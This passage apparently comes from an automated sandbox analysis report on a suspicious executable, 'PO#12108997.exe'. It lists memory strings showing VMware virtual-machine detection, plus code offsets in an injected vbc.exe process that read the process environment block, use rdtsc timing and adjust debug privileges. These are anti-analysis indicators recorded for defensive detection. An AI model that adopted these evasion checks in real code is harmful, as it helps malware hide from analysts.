          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.340315869.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.279805713.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.294463797.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.283141198.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.316791184.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: PO#12108997.exe, 00000000.00000002.271233330.0000000003321000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00409AB0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05597D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05623D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05583D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05628DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05572D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05574F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05588794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05587E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05631608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05594120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h]
